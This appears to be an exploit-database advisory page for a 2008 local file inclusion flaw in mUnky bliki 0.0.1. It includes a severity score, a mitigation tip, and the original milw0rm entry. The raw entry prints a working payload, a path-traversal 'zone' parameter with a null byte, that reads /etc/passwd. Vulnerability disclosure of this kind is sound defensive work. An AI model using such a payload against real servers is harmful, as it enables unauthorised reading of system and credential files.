mUnky 0.0.1 - exploit.company

vendor:

munky_bliki

by:

StAkeR

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: munky_bliki

Affected Version From: 0.0.1

Affected Version To: 0.0.1

Patch Exists: NO

Related CWE: N/A

CPE: a:munky:munky_bliki:0.01a

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

mUnky 0.0.1 <= Local File Inclusion Vuln

mUnky 0.0.1 is vulnerable to Local File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with maliciously crafted 'zone' parameter. This parameter can be used to include arbitrary files from the local system. An attacker can use this vulnerability to gain access to sensitive information such as /etc/passwd file.

Mitigation:

The best way to mitigate this vulnerability is to validate the user input and restrict the access to the local files.

Source

Exploit-DB raw data:

@~~===========================================~~@
|  Author => StAkeR ~ StAkeR@hotmail.it         |  
@~~===========================================~~@ 
+                                               + 
@~~===========================================~~@
|  mUnky 0.0.1 <= Local File Inclusion Vuln     |
@~~===========================================~~@
|  index.php?zone=../../../../../etc/passwd%00  |                        
@~~===========================================~~@
+
@~~=========================================================================~~@
|  http://dfn.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz   |
@~~=========================================================================~~@

# milw0rm.com [2008-06-25]